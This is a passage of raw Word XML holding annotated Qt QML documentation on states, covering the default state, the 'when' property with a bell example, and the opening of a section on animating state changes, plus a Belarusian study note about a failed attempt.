          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property and a</w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">default state </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the empty string (</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains all of an item's initial property values</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default state </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is useful</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for managing property values before state changes.</w:t>
      </w:r>
      <w:r w:rsidR="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting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state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property to an empty string will </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the default state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2062" w:name="the-when-property"/>
      <w:bookmarkStart w:id="2063" w:name="_Toc483000977"/>
      <w:bookmarkStart w:id="2064" w:name="_Toc483003968"/>
      <w:bookmarkStart w:id="2065" w:name="_Toc483604319"/>
      <w:bookmarkStart w:id="2066" w:name="_Toc483605539"/>
      <w:bookmarkEnd w:id="2062"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2063"/>
      <w:bookmarkEnd w:id="2064"/>
      <w:bookmarkEnd w:id="2065"/>
      <w:bookmarkEnd w:id="2066"/>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For convenience</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2438" w:history="1">
        <w:r w:rsidRPr="00DC3801">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property that can bind to expressions to change the state whenever the bound expression evaluates to</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.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when</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property will revert the state back to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2439" w:anchor="the-default-state" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>default state</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when the expression evaluates to false.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id</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bell</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width</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>75</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height</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>75</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    color</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"yellow"</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states</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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name</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"RINGING"</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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signal</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state </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"CRITICAL"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</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target</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speaker</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play</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"RING!"</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D911ED">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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bell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component will change to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RINGING</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state whenever the</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signal.state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F462FB" w:rsidRPr="00F462FB" w:rsidRDefault="00DC3801" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F462FB" w:rsidRPr="00DC3801">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я паспрабаваў пераключаць стан аднаго айтэма, калі колер другога буд</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>зе пэўным. У мяне не атрымалася</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2067" w:name="animating-state-changes"/>
      <w:bookmarkStart w:id="2068" w:name="_Toc483000978"/>
      <w:bookmarkStart w:id="2069" w:name="_Toc483003969"/>
      <w:bookmarkStart w:id="2070" w:name="_Toc483604320"/>
      <w:bookmarkStart w:id="2071" w:name="_Toc483605540"/>
      <w:bookmarkEnd w:id="2067"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animating State Changes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2068"/>
      <w:bookmarkEnd w:id="2069"/>
      <w:bookmarkEnd w:id="2070"/>
      <w:bookmarkEnd w:id="2071"/>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> induce </w:t>
      </w:r>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abrupt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> value changes. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2440" w:anchor="transition" w:history="1">
        <w:r w:rsidRPr="00F462FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transition</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smoother changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> during state changes. In transitions, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interpolation behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are definable. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2441" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animation and Transitions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
